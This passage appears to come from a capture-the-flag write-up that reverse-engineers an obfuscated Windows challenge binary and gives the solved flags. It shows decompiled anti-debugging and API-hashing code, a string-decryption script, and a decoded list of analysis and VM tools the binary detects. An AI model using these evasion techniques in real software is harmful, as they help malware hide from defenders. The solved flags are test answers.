0x260FC729 38.15.199.41 2→1 (if directly call) My complicated firewall rules told me to not talk to you (if directly call)
0x260FC728 38.15.199.40 3→1 OK
0x64191A0A 100.25.26.10 4→9→4→7→9→7→4→8→9→8→4→6→9→6→4→1
(if input format is msg_<xxx>)
I don’t want to talk to you (if format wrong or input wrong)
0x64191A0B 100.25.26.11 5→1 Okay, I did some spamming. You are welcome!
0x64191A0F 100.25.26.15 6→9→6→1 1 (if all bytes are printable and ascii are even) / 0 (else)
0x400E0319 64.14.3.25 7→9→7→1 strlen(input)
0x400E031D 64.14.3.29 8→9→8→1 weak hash function
0x53305C05 83.48.92.5 - (user IP) -
0x53305C08 83.48.92.8 9→1 xor 0x42

From the table we can see function 1 is for the final output, and function 4 is the most important part. For chain 4, the constraints are: length == 8, ascii == even, hash == 0x06022e46. A solution is: :"*$$*":

1
2
3
    what: msg_:"*$$*":
where: 100.25.26.10
received: CMO{secret_code_v9hcdkd2}

CMO{secret_code_jx65692q}

moment

The code of this program is very chaotic, and try to use debugger will make the program die before main. Note that this program has a huge init function table:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
.rdata:00000001401128A8 ; const _PVFV First_
.rdata:00000001401128A8 First_ dq 0
.rdata:00000001401128B0 dq offset ?pre_cpp_initialization@@YAXXZ
.rdata:00000001401128B8 dq offset atexit_unknown_libname_8
.rdata:00000001401128C0 dq offset longfunc_3C615
.rdata:00000001401128C8 dq offset CRC32_Choice
.rdata:00000001401128D0 dq offset pf_1
.rdata:00000001401128D8 dq offset pf_2
.rdata:00000001401128E0 dq offset xyobfunc
.rdata:00000001401128E8 dq offset SetConsole
.rdata:00000001401128F0 dq offset fread_5851F42D4C957F2D
.rdata:00000001401128F8 dq offset OpenSCManagerService
.rdata:0000000140112900 dq offset longfunc_10735
.rdata:0000000140112908 dq offset atexit_1400BFFD0
.rdata:0000000140112910 dq offset atexit_d_1400BFF60
.rdata:0000000140112918 dq offset atexit_1400BFEA0
.rdata:0000000140112920 dq offset atexit_140102BA0
.rdata:0000000140112928 dq offset atexit_140102A50
.rdata:0000000140112930 dq offset atexit_d_140102A20
.rdata:0000000140112938 dq offset atexit_d_1401029F0
.rdata:0000000140112940 dq offset atexit_d_1401029C0
.rdata:0000000140112948 dq offset atexit_1401028D0
.rdata:0000000140112950 dq offset atexit_140102810
.rdata:0000000140112958 dq offset CreateEvent_14012B3D8_atexit_140102800
.rdata:0000000140112960 dq offset GetCurrentThread_14012B420
.rdata:0000000140112968 dq offset GetCurrentThread_14012B470
.rdata:0000000140112970 dq offset GetCurrentThread_14012B4C0

longfunc_3C615 compiles a regex to find all *.dll files at the beginning. However, in debugging, the program accessed a wrong memory addr at .text:000000014001916D call sub_1400BB6A0 in longfunc_3C615, and this function sub_1400BB6A0 is very weird:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
.text:00000001400BB6A0 ; _QWORD *__fastcall sub_1400BB6A0(_QWORD *)
.text:00000001400BB6A0 sub_1400BB6A0 proc near
.text:00000001400BB6A0 var_40 = qword ptr -40h
.text:00000001400BB6A0 arg_10 = qword ptr 20h
.text:00000001400BB6A0 arg_18 = qword ptr 28h
.text:00000001400BB6A0 ; __unwind { // __C_specific_handler
.text:00000001400BB6A0 push rbp
.text:00000001400BB6A1 push r15
.text:00000001400BB6A3 push r14
.text:00000001400BB6A5 push r13
.text:00000001400BB6A7 push r12
.text:00000001400BB6A9 push rsi
.text:00000001400BB6AA push rdi
.text:00000001400BB6AB push rbx
.text:00000001400BB6AC sub rsp, 28h
.text:00000001400BB6B0 lea rbp, [rsp+20h]
.text:00000001400BB6B5 mov rsi, rcx
.text:00000001400BB6B8 mov [rbp+40h+arg_10], r8
.text:00000001400BB6BC mov [rbp+40h+arg_18], r9
.text:00000001400BB6C0 lea rax, [rbp+40h+arg_10]
.text:00000001400BB6C4 mov [rbp+40h+var_40], rax
.text:00000001400BB6C8 call sub_1400BEF20
.text:00000001400BB6CD xor ebx, ebx
.text:00000001400BB6CF mov edx, 4
.text:00000001400BB6D4 xor ecx, ecx
.text:00000001400BB6D6 mov r8d, 3000h
.text:00000001400BB6DC mov r9d, 4
.text:00000001400BB6E2 call rax
.text:00000001400BB6E4 mov [rsi], rax
.text:00000001400BB6E7 mov dword ptr [rax], 0
.text:00000001400BB6ED mov r15d, 77190988h
.text:00000001400BB6F3 mov rdi, 99A33F9AD5D7800Bh
.text:00000001400BB6FD nop dword ptr [rax]
.text:00000001400BB700 loc_1400BB700: ; CODE XREF: sub_1400BB6A0:loc_1400BB760↓j
.text:00000001400BB700 mov rax, [rbp+40h+var_40]
.text:00000001400BB704 lea rcx, [rax+8]
.text:00000001400BB708 mov [rbp+40h+var_40], rcx
.text:00000001400BB70C cmp qword ptr [rsi], 0
.text:00000001400BB710 jz short loc_1400BB77C
.text:00000001400BB712 movsxd r13, dword ptr [rax]
.text:00000001400BB715 shl r13, 4
.text:00000001400BB719 lea rax, unk_140111680
.text:00000001400BB720 lea r12, [rax+r13]
.text:00000001400BB724 mov r14d, ds:7FFE02F8h
.text:00000001400BB72C xor r14d, r15d
.text:00000001400BB72F add r14d, 0CD42AD3Ah
.text:00000001400BB736 loc_1400BB736: ; DATA XREF: .rdata:00000001401208D0↓o
.text:00000001400BB736 ; __try { // __except at 1400BB764
.text:00000001400BB736 mov ecx, 9626887h
.text:00000001400BB73B call r14
.text:00000001400BB73E call nullsub_1
.text:00000001400BB743 mov rcx, rdi
.text:00000001400BB746 call r14
.text:00000001400BB749 loc_1400BB749: ; DATA XREF: .rdata:00000001401208D0↓o
.text:00000001400BB749 xor al, 9Ah
.text:00000001400BB74B mov rcx, [rsi]
.text:00000001400BB74E mov [rcx+rbx], al
.text:00000001400BB751 jmp qword ptr cs:loc_1400BB760
.text:00000001400BB757 db 30h ; 0
.text:00000001400BB758 db 53h ; S
.text:00000001400BB759 loc_1400BB759: ; CODE XREF: sub_1400BB6A0+DA↓j
.text:00000001400BB759 inc rbx
.text:00000001400BB75C cmp rbx, 4
.text:00000001400BB760 loc_1400BB760: ; DATA XREF: sub_1400BB6A0+B1↑r
.text:00000001400BB760 jnz short loc_1400BB700
.text:00000001400BB762 jmp short loc_1400BB77C
.text:00000001400BB764 ; __except(1) // owned by 1400BB736
.text:00000001400BB764 lea rax, unk_140111680
.text:00000001400BB764 ; DATA XREF: .rdata:00000001401208D0↓o
.text:00000001400BB76B call qword ptr [r13+rax+8]
.text:00000001400BB770 xor al, [r12]
.text:00000001400BB774 mov rcx, [rsi]
.text:00000001400BB777 mov [rcx+rbx], al
.text:00000001400BB77A jmp short loc_1400BB759
.text:00000001400BB77C loc_1400BB77C: ; CODE XREF: sub_1400BB6A0+70↑j
.text:00000001400BB77C ; sub_1400BB6A0+C2↑j
.text:00000001400BB77C mov rax, rsi
.text:00000001400BB77F add rsp, 28h
.text:00000001400BB783 pop rbx
.text:00000001400BB784 pop rdi
.text:00000001400BB785 pop rsi
.text:00000001400BB786 pop r12
.text:00000001400BB788 pop r13
.text:00000001400BB78A pop r14
.text:00000001400BB78C pop r15
.text:00000001400BB78E pop rbp
.text:00000001400BB78F retn
.text:00000001400BB78F ; } // starts at 1400BB6A0
.text:00000001400BB78F sub_1400BB6A0 endp

In fact, this function relies on exception, and sub is a dll function hash parser, in all cases of longfunc_3C615, its corresponding function is kernel32_VirtualAlloc. After passing the exception to the program, the program successfully runs into main. In main, the program has a loop function in a while 1 loop, and sub_140108DE0 is called in the loop, this function will create many threads to anti-debug:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
void __noreturn call_func_tables()
{
v56 = -2;
while ( 1 )
{
if ( DuplicateHandle((_Mtx_t)&dword_14012B420) )
goto LABEL_74;
if ( HIDWORD(qword_14012B468) == 0x7FFFFFFF )
{
LABEL_75:
HIDWORD(qword_14012B468) = 2147483646;
IsDBCSLeadByteEx(6u, TestChar);
__debugbreak();
}
for ( p_??_R0?AVbad_array_new_length@std@@@8 = &func_table;
p_??_R0?AVbad_array_new_length@std@@@8 != (__int64 (__fastcall **)())&std::bad_array_new_length `RTTI Type Descriptor';
p_??_R0?AVbad_array_new_length@std@@@8 += 2 )
{
if ( *((_BYTE *)p_??_R0?AVbad_array_new_length@std@@@8 + 12) || (byte_14012B5FD & 1) == 0 )
{
*((_BYTE *)p_??_R0?AVbad_array_new_length@std@@@8 + 12) = 0;
v2 = *((_DWORD *)p_??_R0?AVbad_array_new_length@std@@@8 + 2);
v3 = *p_??_R0?AVbad_array_new_length@std@@@8;
ArgList = operator new(0x18u);
*(_DWORD *)ArgList = v2;
ArgList[1] = v3;
ArgList[2] = sub_1401044F0;
*(_QWORD *)ThrdAddr = beginthreadex(0, 0, sub_140109590, ArgList, 0, &ThrdAddr[2]);
if ( !*(_QWORD *)ThrdAddr )
{
ThrdAddr[2] = 0;
IsDBCSLeadByteEx(6u, TestChar_1);
LABEL_72:
IsDBCSLeadByteEx(1u, TestChar_2);
LABEL_73:
IsDBCSLeadByteEx(1u, TestChar_1);
LABEL_74:
IsDBCSLeadByteEx(5u, TestChar);
goto LABEL_75;
}
if ( !ThrdAddr[2] )
goto LABEL_73;
__asm
{
vmovups xmm0, xmmword ptr [rbp+40h+var_50]
vmovaps xmmword ptr [rbp+40h+Buffer._Hnd], xmm0
}
if ( SetLastError(&Buffer) )
goto LABEL_72;
}
}
if ( (byte_14012B5FD & 1) != 0 )
goto LABEL_42;
j = 0;
__asm { rdgsbase rbx }
v10 = -38083264;
for ( i = **(__int64 ***)(*(_QWORD *)(*(_QWORD *)(_RBX + 96) + 24LL) + 16LL); ; i = (__int64 *)*i )
{
if ( !j )
goto LABEL_78;
v12 = -1145602568;
if ( (unsigned __int16)(*((_WORD *)i + 44) - 8) >= 2u )
{
v13 = 0;
do
{
v12 = 16777619 * (v12 ^ *(char *)(i[12] + v13));
v13 += 2;
}
while ( 2 * ((unsigned __int64)(unsigned __int16)(*((_WORD *)i + 44) - 8) >> 1) != v13 );
}
if ( v12 == j )
{
LABEL_78:
v14 = i[6];
v15 = *(int *)(v14 + 60);
v16 = *(unsigned int *)(v14 + v15 + 136);
v17 = (unsigned int *)(v14 + v16);
if ( *(_DWORD *)(v14 + v15 + 136) )
break;
}
LABEL_17:
;
}
v18 = *(unsigned int *)(v14 + v15 + 140);
v19 = v17[6];
do
{
if ( v19-- == 0 )
goto LABEL_17;
v22 = *(unsigned int *)(v14 + v17[8] + 4 * v19);
v23 = *(_BYTE *)(v14 + v22);
if ( v23 )
{
v24 = (char *)(v14 + 1 + v22);
v20 = -1145602568;
do
{
v20 = 16777619 * (v20 ^ v23);
v23 = *v24++;
}
while ( v23 );
}
else
{
v20 = -1145602568;
}
}
while ( v20 != v10 );
v25 = *(unsigned int *)(v14 + v17[7] + 4LL * *(unsigned __int16 *)(v14 + v17[9] + 2LL * (unsigned int)v19));
v26 = (char *)(v25 + v14);
if ( (unsigned int)v16 < (unsigned int)v25 && (char *)v17 + v18 > v26 )
break;
((void (__fastcall *)(_QWORD))v26)(*((_QWORD *)&xmmword_14012B2B8 + 1));
v31 = byte_14012B5FC;
v30 = _InterlockedCompareExchange8(&byte_14012B5FD, 1, byte_14012B5FC);
if ( v31 != v30 )
byte_14012B5FC = v30;
LABEL_42:
n24000000 = GetProcessAffinityMask();
v33 = TlsSetValue();
v34 = v33;
if ( n24000000 == 10000000 )
{
v35 = 100 * v33;
}
else if ( n24000000 == 24000000 )
{
v35 = 1000000000 * (v33 / 24000000) + 1000000000 * (v33 % 24000000) / 24000000;
}
else
{
if ( (n24000000 | (unsigned __int64)v33) >> 32 )
{
v49 = v33 / n24000000;
v50 = v34 % n24000000;
}
else
{
v50 = (unsigned int)v33 % (unsigned int)n24000000;
v49 = (unsigned int)v33 / (unsigned int)n24000000;
}
v51 = 1000000000 * v49;
v52 = 1000000000 * v50;
if ( ((1000000000 * v50) | (unsigned __int64)n24000000) >> 32 )
v53 = v52 / n24000000;
else
v53 = (unsigned int)v52 / (unsigned int)n24000000;
v35 = v51 + v53;
}
v36 = v35 + 500000000;
if ( v35 >= 0x7FFFFFFFE2329AFFLL )
v36 = 0x7FFFFFFFFFFFFFFFLL;
while ( 1 )
{
n24000000_1 = GetProcessAffinityMask();
v39 = TlsSetValue();
v40 = v39;
if ( n24000000_1 == 10000000 )
{
v41 = 100 * v39;
}
else if ( n24000000_1 == 24000000 )
{
v41 = 1000000000 * (v39 / 24000000) + 1000000000 * (v39 % 24000000) / 24000000;
}
else
{
if ( (n24000000_1 | (unsigned __int64)v39) >> 32 )
{
v44 = v39 / n24000000_1;
v45 = v40 % n24000000_1;
}
else
{
v45 = (unsigned int)v39 % (unsigned int)n24000000_1;
v44 = (unsigned int)v39 / (unsigned int)n24000000_1;
}
v46 = 1000000000 * v44;
v47 = 1000000000 * v45;
v48 = ((1000000000 * v45) | (unsigned __int64)n24000000_1) >> 32
? v47 / n24000000_1
: (unsigned int)v47 / (unsigned int)n24000000_1;
v41 = v46 + v48;
}
v42 = v36 - v41;
if ( v36 <= v41 )
break;
v43 = 100 * GetHandleInformation();
if ( v42 >= 864000000000000LL )
v42 = 864000000000000LL;
v37 = v42 + v43;
Buffer._Hnd = (void *)(v37 / 1000000000);
Buffer._Id = v37 % 1000000000;
ResetEvent((const xtime *)&Buffer);
}
GetThreadPriority((_Mtx_t)&dword_14012B420);
}
n46 = *v26;
v10 = 0xBBB77DF8;
for ( j = 0xBBB77DF8; n46 != 46; ++v26 )
{
j = 0x1000193 * (j ^ n46);
n46 = v26[1];
}
v28 = v26[1];
if ( v28 )
{
v29 = v26 + 2;
v10 = 0xBBB77DF8;
do
{
v10 = 0x1000193 * (v10 ^ v28);
v28 = *v29++;
}
while ( v28 );
}
i = ***(__int64 ****)(*(_QWORD *)(*(_QWORD *)(_RBX + 96) + 24LL) + 16LL);
goto LABEL_17;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
.data:00007FF737ACA4A0 func_table dq offset func_table_1_longfunc_9663
.data:00007FF737ACA4A8 dq 77190988h
.data:00007FF737ACA4B0 dq offset func_table_2
.data:00007FF737ACA4B8 dq 77190989h
.data:00007FF737ACA4C0 dq offset func_table_3
.data:00007FF737ACA4C8 dq 7719098Ah
.data:00007FF737ACA4D0 dq offset func_table_4
.data:00007FF737ACA4D8 dq 7719098Bh
.data:00007FF737ACA4E0 dq offset func_table_5
.data:00007FF737ACA4E8 dq 7719098Ch
.data:00007FF737ACA4F0 dq offset func_table_6
.data:00007FF737ACA4F8 dq 7719098Dh
.data:00007FF737ACA500 dq offset func_table_7_longfunc_B6EE
.data:00007FF737ACA508 dq 7719098Eh
.data:00007FF737ACA510 dq offset func_table_8
.data:00007FF737ACA518 dq 7719098Fh
.data:00007FF737ACA520 dq offset func_table_9
.data:00007FF737ACA528 dq 77190980h
.data:00007FF737ACA530 dq offset func_table_10
.data:00007FF737ACA538 dq 77190981h
.data:00007FF737ACA540 dq offset func_table_11
.data:00007FF737ACA548 dq 77190982h
.data:00007FF737ACA550 dq offset func_table_12
.data:00007FF737ACA558 dq 77190983h
.data:00007FF737ACA560 dq offset func_table_13
.data:00007FF737ACA568 dq 77190984h
.data:00007FF737ACA570 dq offset func_table_14
.data:00007FF737ACA578 dq 77190985h
.data:00007FF737ACA580 dq offset func_table_15
.data:00007FF737ACA588 dq 77190986h
.data:00007FF737ACA590 dq offset func_table_16
.data:00007FF737ACA598 dq 77190987h
.data:00007FF737ACA5A0 dq offset func_table_17
.data:00007FF737ACA5A8 dq 77190998h

These functions are almost all long functions, and deeply obfuscated.

After the call_func_tables there are some cipher strings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
sub_1401031A0:
.text:000000014010350C mov dword ptr [rsp+1F0h+str+110h], 3Eh ; '>'
.text:0000000140103517 mov dword ptr [rsp+1F0h+str+108h], 16h ; n22
...
.text:0000000140103651 mov dword ptr [rsp+1F0h+str+10h], 18h ; n24
.text:0000000140103659 mov dword ptr [rsp+1F0h+str+8], 43h ; 'C' ; n67
.text:0000000140103661 mov dword ptr [rsp+1F0h+str], 57h ; 'W' ; n87
.text:0000000140103669 lea rcx, [rbp+170h+Str] ; p_Str
.text:0000000140103670 mov r8d, 41h ; 'A' ; n65
.text:0000000140103676 mov r9d, 12h ; n18
.text:000000014010367C call decstr

main_loop:
.text:0000000140106A01 mov dword ptr [rsp+1310h+arr+180h], 3Eh ; '>' ; n62
.text:0000000140106A0C mov dword ptr [rsp+1310h+arr+178h], 18h ; n24
...
.text:0000000140106BE0 mov dword ptr [rsp+1310h+arr+10h], 43h ; 'C' ; n67
.text:0000000140106BE8 mov dword ptr [rsp+1310h+arr+8], 4Bh ; 'K' ; n75
.text:0000000140106BF0 mov dword ptr [rsp+1310h+arr], 53h ; 'S' ; n83
.text:0000000140106BF8 lea rcx, [rbp+1290h+var_1110] ; Buffer
.text:0000000140106BFF mov r8d, 4Ah ; 'J' ; n74
.text:0000000140106C05 mov r9d, 53h ; 'S' ; n83
.text:0000000140106C0B call decstr_0

.text:0000000140107459 mov dword ptr [rsp+1310h+arr+1D8h], 3Eh ; '>'
.text:0000000140107464 mov dword ptr [rsp+1310h+arr+1D0h], 12h
...
.text:00000001401076B1 mov dword ptr [rsp+1310h+arr+10h], 4
.text:00000001401076B9 mov dword ptr [rsp+1310h+arr+8], 11h
.text:00000001401076C1 mov dword ptr [rsp+1310h+arr], 4
.text:00000001401076C9 lea rcx, [rbp+1290h+var_1110] ; Buffer
.text:00000001401076D0 mov r8d, 16h
.text:00000001401076D6 mov r9d, 7
.text:00000001401076DC call decstr_1

These strings are encrypted, try to decrypt:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def dec(x):
if 0 <= x <= 25: return chr(ord('a') + x)
if x == 87: return ','
if x == 67: return ' '
if x == 62: return '.'
return f'\\x{x:02x}'

arr1 = [65,18,87,67,24,14,20,11,11,67,13,4,21,4,17,67,17,4,2,14,21,4,17,67,19,7,4,67,5,11,0,6,67,13,14,22,62]
print(''.join(dec(i) for i in arr1))

arr2 = [74,83,83,75,67,22,0,19,2,7,3,14,6,67,3,8,3,67,13,14,19,67,8,13,8,19,8,0,11,8,25,4,62,67,19,0,12,15,4,17,8,13,6,67,11,8,10,4,11,24,62]
print(''.join(dec(i) for i in arr2))

arr3 = [22,7,4,17,4,67,2,14,13,19,17,14,11,67,0,13,3,67,8,3,4,13,19,8,19,24,67,0,11,8,6,13,67,24,14,20,11,11,67,5,8,13,3,67,19,7,4,67,10,4,24,67,19,14,67,19,7,4,67,65,18,62]
print(''.join(dec(i) for i in arr3))

This is just the program’s output:

1
2
3
\x41s, youll never recover the flag now.
\x4a\x53\x53\x4b watchdog did not initialize. tampering likely.
where control and identity align youll find the key to the \x41s.

Try to find All encrypted strings:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
import idaapi
import idc
import idautils

def is_mov_to_stack_with_imm(ea):
insn = idaapi.insn_t()
if not idaapi.decode_insn(insn, ea):
return False, None, None
if insn.itype != idaapi.NN_mov:
return False, None, None
if insn.ops[0].type != idaapi.o_displ:
return False, None, None
if insn.ops[1].type != idaapi.o_imm:
return False, None, None
reg_name = idaapi.get_reg_name(insn.ops[0].reg, 8)
if reg_name not in ("rsp", "rbp"):
return False, None, None
disp = insn.ops[0].addr
imm = insn.ops[1].value & 0xFFFFFFFF
if imm > 0xFF:
return False, None, None
return True, disp, imm

def read_byte_at(ea):
b = idc.get_wide_byte(ea)
return b if b != idaapi.BADADDR else None

def dec(x):
if 0 <= x <= 25:
return chr(ord('a') + x)
if x == 87:
return ','
if x == 67:
return ' '
if x == 62:
return '.'
return f'\\x{x:02x}'

def find_mov_sequences(min_length=4):
seg = idaapi.get_segm_by_name(".text")
if not seg:
print("[-] .text segment not found")
return []
start_ea = seg.start_ea
end_ea = seg.end_ea
ea = start_ea
results = []

while ea < end_ea:
current_seq = []
prev_disp = None
seq_start_ea = ea
temp_ea = ea
while temp_ea < end_ea:
ok, disp, imm = is_mov_to_stack_with_imm(temp_ea)
if not ok:
break
if current_seq:
if prev_disp - disp != 8:
break
current_seq.append((temp_ea, disp, imm))
prev_disp = disp
temp_ea = idc.next_head(temp_ea, end_ea)

if len(current_seq) >= min_length:
last_mov_ea = current_seq[-1][0]
r8_ea = last_mov_ea + 0x11
r9_ea = last_mov_ea + 0x6
r8_val = read_byte_at(r8_ea)
r9_val = read_byte_at(r9_ea)
if r8_val is not None and r9_val is not None:
if r8_val < 127 and r9_val < 127:
bytes_list = [entry[2] for entry in current_seq]
final_array = [r8_val, r9_val] + bytes_list[::-1]
decrypted = ''.join(dec(x) for x in final_array)
print(f"{seq_start_ea:#x} -> {decrypted}")
results.append((seq_start_ea, final_array, decrypted))
else:
print(f"[-] r8/r9 out of range at {seq_start_ea:#x}: r8={r8_val}, r9={r9_val}")
else:
print(f"[-] Failed to read r8/r9 at {seq_start_ea:#x}")
ea = current_seq[-1][0]
ea = idc.next_head(ea, end_ea)

return results

def main():
results = find_mov_sequences(min_length=4)
print(f"[+] Total {len(results)} strings decoded.")

if __name__ == "__main__":
main()

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
0x140001137 -> \x2ea\x1d\x22\x2c\x1c\x25\x28\x2c\x1e\x1d
0x140001711 -> caaccme
0x140001a01 -> \x1ca\x40\x48extend\x40\x48rmmetadata\x40\x48txflog\x40
0x140001e21 -> \x2dax\x25og\x27tfs
0x140002151 -> nauser.dat
0x1400041fd -> \x1darectory
0x14000452b -> \x2cambolic\x25ink
0x140004e8b -> \x29aocess
0x1400051ab -> \x2daread
0x1400054cb -> \x29artition
0x1400057fb -> \x2eaer\x1apc\x2beserve
0x140005b5b -> \x22a\x1completion\x2beserve
0x140005eeb -> \x1aativity\x2beference
0x14000626b -> \x29aocess\x2ctate\x1change
0x1400065fb -> \x2daread\x2ctate\x1change
0x14000697b -> \x1cau\x29artition
0x140006ccb -> \x29a\x2cilo\x1context\x29aged
0x14000705b -> \x29a\x2cilo\x1context\x27on\x29aged
0x14000740b -> \x1dabug\x28bject
0x140007a5b -> \x26atant
0x140007d7b -> \x1callback
0x1400080ab -> \x2camaphore
0x1400086eb -> \x22a\x2dimer
0x140008a0b -> \x29aofile
0x140008d2b -> \x24ayed\x1event
0x14000906b -> \x30andow\x2ctation
0x1400093bb -> \x1dasktop
0x1400096db -> \x1camposition
0x140009a1b -> \x2baw\x22nput\x26anager
0x140009d7b -> \x1care\x26essaging
0x14000a0cb -> \x1aativation\x28bject
0x14000a43b -> \x2da\x30orker\x1factory
0x14000a79b -> \x1aaapter
0x14000aabb -> \x1cantroller
0x14000adfb -> \x1davice
0x14000b11b -> \x1daiver
0x14000b43b -> \x22a\x1completion
0x14000b78b -> \x30ait\x1completion\x29acket
0x14000be3b -> \x22a\x2bing
0x14000cd9b -> \x2caction
0x14000d0bb -> \x2cassion
0x14000d6db -> \x2bagistry\x2dransaction
0x14000da6b -> \x1daa\x1adapter
0x14000ddab -> \x1aa\x29\x1c \x29ort
0x14000e0db -> \x1eaergy\x2dracker
0x14000e42b -> \x29awer\x2bequest
0x14000e77b -> \x30ai\x20uid
0x14000ea9b -> \x1eaw\x2begistration
0x14000edfb -> \x1eaw\x2cession\x1demux\x1entry
0x14000f19b -> \x1eaw\x1consumer
0x14000f4db -> \x1caverage\x2campler
0x14000f83b -> \x29aw\x28bject
0x14000fb6b -> \x1falter\x1connection\x29ort
0x14000ff0b -> \x1falter\x1communication\x29ort
0x1400102cb -> \x27ais\x1cm\x2ctate
0x14001060b -> \x1dagk\x2chared\x2besource
0x14001099b -> \x1dagk\x2chared\x24eyed\x26utex\x28bject
0x140010d7b -> \x1dagk\x2chared\x2cync\x28bject
0x14001111b -> \x1dagk\x2chared\x2cwap\x1chain\x28bject
0x1400114eb -> \x1dagk\x1display\x26anager\x28bject
0x1400118bb -> \x1dagk\x2chared\x29rotected\x2cession\x28bject
0x140011cdb -> \x1dagk\x2chared\x1bundle\x28bject
0x14001208b -> \x1dagk\x1composition\x28bject
0x14001242d -> \x2faeg\x1configuration\x1context
0x140019e9e -> \x2fa\x30\x1a\x2b\x1e
0x14001a70f -> \x2fa\x2d\x2e\x1a\x25
0x14001f787 -> \x2faox\x26ini\x2bdr\x1d\x27
0x14001fadf -> \x2faox\x26ini\x2bd\x1d\x27
0x14001fe1f -> \x2faox\x2dray\x22\x29\x1c
0x14002045f -> \x2fa\x20eneration\x1counter
0x1400207ef -> \x1darace
0x140020aff -> \x2fa\x1c\x22\x20uest\x1dev
0x14002197c -> \x24a\x26\x24\x2f\x26\x24\x2f\x26
0x140021c8f -> \x26acrosoft \x21v
0x140021f8f -> \x2faware\x2f\x26ware
0x14002228f -> \x31an\x2f\x26\x26\x31en\x2f\x26\x26
0x14002258f -> pal hyperv
0x14002288f -> \x2faox\x2fbox\x2fbox
0x1400238b6 -> tapview.exe
0x140023bff -> darace.exe
0x140023f2f -> \x1faddler \x1everywhere.exe
0x1400242df -> \x1faddler.\x30eb\x2ei.exe
0x14002464f -> \x30areshark.exe
0x14002499f -> damppcap.exe
0x140024cdf -> \x2cayllax\x3a\x38.exe
0x14002502f -> wandbg.exe
0x14002535f -> \x1dag\x31.\x2chell.exe
0x1400256af -> iaa\x3a\x38.exe
0x1400259df -> iaa.exe
0x140025cff -> iaaq.exe
0x14002601f -> \x2ba\x1class\x1ex.exe
0x14002636f -> \x2ba\x1class\x1ex\x3a\x38.exe
0x1400266cf -> \x2ba\x1class.\x27\x1e\x2d.exe
0x140026a2f -> \x24aump.exe
0x140026d5f -> \x24aump\x3a\x38.exe
0x14002709f -> \x1dabug\x2fiew.exe
0x1400273ef -> \x2cas\x1exp.exe
0x14002771f -> \x30an\x2cpy.exe
0x140027a4f -> \x29aoc\x1exp\x31.exe
0x140027d8f -> \x29aoc\x26on\x31.exe
0x1400280cf -> \x30andow\x2ditle\x1ex.exe
0x14002843f -> \x1daiver\x26on.exe
0x14002878f -> \x1ea\x30\x1explorer.exe
0x140028aef -> \x29aol\x26on\x31v\x36.exe
0x140028e3f -> \x29arf\x26on\x31.exe
0x14002917f -> \x24arnel\x28bject\x2fiew.exe
0x14002950f -> \x28aj\x1dir.exe
0x14002983f -> \x28aj\x1exp.exe
0x140029b6f -> \x1dagview.exe
0x140029eaf -> dagview\x3a\x38.exe
0x14002a1ff -> natmyfault.exe
0x14002a54f -> natmyfault\x3a\x38.exe
0x14002a8bf -> paocexp.exe
0x14002abff -> \x29aocmon.exe
0x14002af3f -> paocdump.exe
0x14002b27f -> pasuspend.exe
0x14002b5cf -> pasuspend\x3a\x38.exe
0x14002b92f -> tapview\x3a\x38.exe
0x14002bc7f -> vamap.exe
0x14002bfaf -> vamap\x3a\x38.exe
0x14002c2ef -> \x30anobj.exe
0x14002c61f -> \x30anobj\x3a\x38.exe
0x14002c95f -> xa\x38dbg.exe
0x14002cc8f -> xa\x36dbg.exe
0x14002cfbf -> xa\x3adbg.exe
